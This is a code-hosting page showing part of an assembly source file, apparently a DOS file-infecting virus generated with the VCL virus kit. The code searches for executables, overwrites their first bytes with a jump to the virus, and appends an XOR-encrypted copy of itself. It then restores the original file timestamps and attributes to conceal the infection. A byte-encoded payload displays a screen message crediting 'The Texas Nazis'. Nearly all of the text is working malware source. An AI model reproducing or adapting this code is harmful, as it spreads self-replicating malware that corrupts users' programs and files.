📄 diarrhe6.asm
字号:
ret ; Return to caller
find_files endp
infect_file proc near
mov ah,02Fh ; DOS get DTA address function
int 021h
mov si,bx ; SI points to the DTA
mov byte ptr [di + set_carry],0 ; Assume we'll fail
cmp word ptr [si + 01Ah],(65279 - (finish - start))
jbe size_ok ; If it's small enough continue
jmp infection_done ; Otherwise exit
size_ok: mov ax,03D00h ; DOS open file function, r/o
lea dx,[si + 01Eh] ; DX points to file name
int 021h
xchg bx,ax ; BX holds file handle
mov ah,03Fh ; DOS read from file function
mov cx,3 ; CX holds bytes to read (3)
lea dx,[di + buffer] ; DX points to buffer
int 021h
mov ax,04202h ; DOS file seek function, EOF
cwd ; Zero DX _ Zero bytes from end
mov cx,dx ; Zero CX /
int 021h
xchg dx,ax ; Faster than a PUSH AX
mov ah,03Eh ; DOS close file function
int 021h
xchg dx,ax ; Faster than a POP AX
sub ax,finish - start + 3 ; Adjust AX for a valid jump
cmp word ptr [di + buffer + 1],ax ; Is there a JMP yet?
je infection_done ; If equal then exit
mov byte ptr [di + set_carry],1 ; Success -- the file is OK
add ax,finish - start ; Re-adjust to make the jump
mov word ptr [di + new_jump + 1],ax ; Construct jump
mov ax,04301h ; DOS set file attrib. function
xor cx,cx ; Clear all attributes
lea dx,[si + 01Eh] ; DX points to victim's name
int 021h
mov ax,03D02h ; DOS open file function, r/w
int 021h
xchg bx,ax ; BX holds file handle
mov ah,040h ; DOS write to file function
mov cx,3 ; CX holds bytes to write (3)
lea dx,[di + new_jump] ; DX points to the jump we made
int 021h
mov ax,04202h ; DOS file seek function, EOF
cwd ; Zero DX _ Zero bytes from end
mov cx,dx ; Zero CX /
int 021h
push si ; Save SI through call
call encrypt_code ; Write an encrypted copy
pop si ; Restore SI
mov ax,05701h ; DOS set file time function
mov cx,[si + 016h] ; CX holds old file time
mov dx,[si + 018h] ; DX holds old file date
int 021h
mov ah,03Eh ; DOS close file function
int 021h
mov ax,04301h ; DOS set file attrib. function
xor ch,ch ; Clear CH for file attribute
mov cl,[si + 015h] ; CX holds file's old attributes
lea dx,[si + 01Eh] ; DX points to victim's name
int 021h
infection_done: cmp byte ptr [di + set_carry],1 ; Set carry flag if failed
ret ; Return to caller
set_carry db ? ; Set-carry-on-exit flag
buffer db 090h,0CDh,020h ; Buffer to hold old three bytes
new_jump db 0E9h,?,? ; New jump to virus
infect_file endp
data00 db "*.EXE",0
data01 dw 254h
db 0EBh, 03Dh, 090h, 000h, 064h, 001h, 002h, 000h
db 000h, 054h, 068h, 065h, 044h, 072h, 061h, 077h
db 020h, 043h, 04Fh, 04Dh, 020h, 066h, 069h, 06Ch
db 065h, 020h, 053h, 063h, 072h, 065h, 065h, 06Eh
db 020h, 053h, 061h, 076h, 065h, 01Ah, 055h, 06Eh
db 073h, 075h, 070h, 070h, 06Fh, 072h, 074h, 065h
db 064h, 020h, 056h, 069h, 064h, 065h, 06Fh, 020h
db 04Dh, 06Fh, 064h, 065h, 00Dh, 00Ah, 024h, 0B4h
db 00Fh, 0CDh, 010h, 0BBh, 000h, 0B8h, 03Ch, 002h
db 074h, 018h, 03Ch, 003h, 074h, 014h, 0C6h, 006h
db 003h, 001h, 000h, 0BBh, 000h, 0B0h, 03Ch, 007h
db 074h, 008h, 0BAh, 026h, 001h, 0B4h, 009h, 0CDh
db 021h, 0C3h, 08Eh, 0C3h, 08Bh, 03Eh, 007h, 001h
db 0BEh, 0F0h, 001h, 0BAh, 0DAh, 003h, 0B3h, 009h
db 08Bh, 00Eh, 004h, 001h, 0FCh, 033h, 0C0h, 0ACh
db 03Ch, 01Bh, 075h, 005h, 080h, 0F4h, 080h, 0EBh
db 06Ah, 03Ch, 010h, 073h, 007h, 080h, 0E4h, 0F0h
db 00Ah, 0E0h, 0EBh, 05Fh, 03Ch, 018h, 074h, 013h
db 073h, 01Fh, 02Ch, 010h, 002h, 0C0h, 002h, 0C0h
db 002h, 0C0h, 002h, 0C0h, 080h, 0E4h, 08Fh, 00Ah
db 0E0h, 0EBh, 048h, 08Bh, 03Eh, 007h, 001h, 081h
db 0C7h, 0A0h, 000h, 089h, 03Eh, 007h, 001h, 0EBh
db 03Ah, 08Bh, 0E9h, 0B9h, 001h, 000h, 03Ch, 019h
db 075h, 008h, 0ACh, 08Ah, 0C8h, 0B0h, 020h, 04Dh
db 0EBh, 00Ah, 03Ch, 01Ah, 075h, 007h, 0ACh, 04Dh
db 08Ah, 0C8h, 0ACh, 04Dh, 041h, 080h, 03Eh, 003h
db 001h, 000h, 074h, 013h, 08Ah, 0F8h, 0ECh, 0D0h
db 0D8h, 072h, 0FBh, 0ECh, 022h, 0C3h, 075h, 0FBh
db 08Ah, 0C7h, 0ABh, 0E2h, 0F1h, 0EBh, 002h, 0F3h
db 0ABh, 08Bh, 0CDh, 0E3h, 002h, 0E2h, 088h, 0C3h
db 00Fh, 010h, 019h, 04Fh, 018h, 019h, 04Fh, 018h
db 019h, 04Fh, 018h, 019h, 003h, 009h, 01Bh, 0DAh
db 01Ah, 044h, 0C4h, 0BFh, 019h, 004h, 018h, 019h
db 003h, 0B3h, 00Ch, 01Bh, 0D2h, 0C4h, 0C4h, 0BFh
db 020h, 0D6h, 0C4h, 0C4h, 0BFh, 020h, 0D6h, 0C4h
db 0D2h, 0C4h, 0BFh, 020h, 020h, 0D6h, 0C4h, 0D2h
db 0C4h, 0BFh, 020h, 0D2h, 020h, 020h, 0C2h, 020h
db 020h, 0D2h, 0C4h, 0C4h, 0BFh, 020h, 0C4h, 0D2h
db 0C4h, 020h, 0D6h, 0C4h, 0C4h, 0BFh, 020h, 0D2h
db 0C4h, 0C4h, 0BFh, 020h, 0D2h, 0C4h, 0C4h, 0BFh
db 020h, 0D2h, 020h, 020h, 0C2h, 020h, 0D2h, 0C4h
db 0C4h, 0BFh, 020h, 0D6h, 0C4h, 0C4h, 0BFh, 020h
db 0D2h, 009h, 01Bh, 0B3h, 019h, 004h, 018h, 019h
db 003h, 0B3h, 00Ch, 01Bh, 0C7h, 0C4h, 019h, 002h
db 0C7h, 0C4h, 0C4h, 0B4h, 019h, 002h, 0BAh, 019h
db 003h, 0BAh, 020h, 0BAh, 020h, 0B3h, 020h, 0D3h
db 0C4h, 0C4h, 0B4h, 020h, 020h, 0BAh, 020h, 020h
db 0B3h, 020h, 020h, 0BAh, 020h, 020h, 0C7h, 0C4h
db 0C4h, 0B4h, 020h, 0C7h, 0C4h, 0C2h, 0D9h, 020h
db 0C7h, 0C4h, 0C2h, 0D9h, 020h, 0C7h, 0C4h, 0C4h
db 0B4h, 020h, 0C7h, 0C4h, 019h, 002h, 0C7h, 0C4h
db 0C4h, 0B4h, 020h, 0BAh, 009h, 01Bh, 0B3h, 019h
db 004h, 018h, 019h, 003h, 0B3h, 00Ch, 01Bh, 0D0h
db 0C4h, 0C4h, 0D9h, 020h, 0D0h, 020h, 020h, 0C1h
db 019h, 002h, 0D0h, 019h, 003h, 0D0h, 020h, 0D0h
db 020h, 0C1h, 020h, 0D3h, 0C4h, 0C4h, 0D9h, 020h
db 020h, 0D0h, 0C4h, 0C4h, 0D9h, 020h, 0C4h, 0D0h
db 0C4h, 020h, 0D0h, 020h, 020h, 0C1h, 020h, 0D0h
db 020h, 0C1h, 020h, 020h, 0D0h, 020h, 0C1h, 020h
db 020h, 0D0h, 020h, 020h, 0C1h, 020h, 0D0h, 0C4h
db 0C4h, 0D9h, 020h, 0D0h, 020h, 020h, 0C1h, 020h
db 06Fh, 009h, 01Bh, 0B3h, 019h, 004h, 018h, 019h
db 003h, 0B3h, 019h, 014h, 00Eh, 01Bh, 02Dh, 02Dh
db 047h, 047h, 020h, 041h, 06Ch, 06Ch, 069h, 06Eh
db 020h, 026h, 020h, 054h, 068h, 065h, 020h, 054h
db 065h, 078h, 061h, 073h, 020h, 04Eh, 061h, 07Ah
db 069h, 073h, 019h, 013h, 009h, 01Bh, 0B3h, 019h
db 004h, 018h, 019h, 003h, 0C0h, 01Ah, 044h, 0C4h
db 0D9h, 019h, 004h, 018h, 019h, 04Fh, 018h, 019h
db 04Fh, 018h, 019h, 04Fh, 018h, 019h, 04Fh, 018h
db 019h, 04Fh, 018h, 019h, 04Fh, 018h, 019h, 04Fh
db 018h, 019h, 04Fh, 018h, 019h, 04Fh, 018h, 019h
db 04Fh, 018h, 019h, 04Fh, 018h, 019h, 04Fh, 018h
db 019h, 04Fh, 018h, 019h, 04Fh, 018h, 019h, 04Fh
db 018h, 019h, 04Fh, 018h
vcl_marker db "[VCL]",0 ; VCL creation marker
encrypt_code proc near
push bp ; Save BP
mov bp,di ; Use BP as pointer to code
lea si,[bp + encrypt_decrypt]; SI points to cipher routine
xor ah,ah ; BIOS get time function
int 01Ah
mov word ptr [si + 9],dx ; Low word of timer is new key
xor byte ptr [si + 1],8 ;
xor byte ptr [si + 8],1 ; Change all SIs to DIs
xor word ptr [si + 11],0101h; (and vice-versa)
lea di,[bp + finish] ; Copy routine into heap
mov cx,finish - encrypt_decrypt - 1 ; All but final RET
push si ; Save SI for later
push cx ; Save CX for later
rep movsb ; Copy the bytes
lea si,[bp + write_stuff] ; SI points to write stuff
mov cx,5 ; CX holds length of write
rep movsb ; Copy the bytes
pop cx ; Restore CX
pop si ; Restore SI
inc cx ; Copy the RET also this time
rep movsb ; Copy the routine again
mov ah,040h ; DOS write to file function
lea dx,[bp + start] ; DX points to virus
lea si,[bp + finish] ; SI points to routine
call si ; Encrypt/write/decrypt
mov di,bp ; DI points to virus again
pop bp ; Restore BP
ret ; Return to caller
write_stuff: mov cx,finish - start ; Length of code
int 021h
encrypt_code endp
end_of_code label near
encrypt_decrypt proc near
lea si,[bp + start_of_code] ; SI points to code to decrypt
mov cx,(end_of_code - start_of_code) / 2 ; CX holds length
xor_loop: db 081h,034h,00h,00h ; XOR a word by the key
inc si ; Do the next word
inc si ;
loop xor_loop ; Loop until we're through
ret ; Return to caller
encrypt_decrypt endp
finish label near
code ends
end main
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -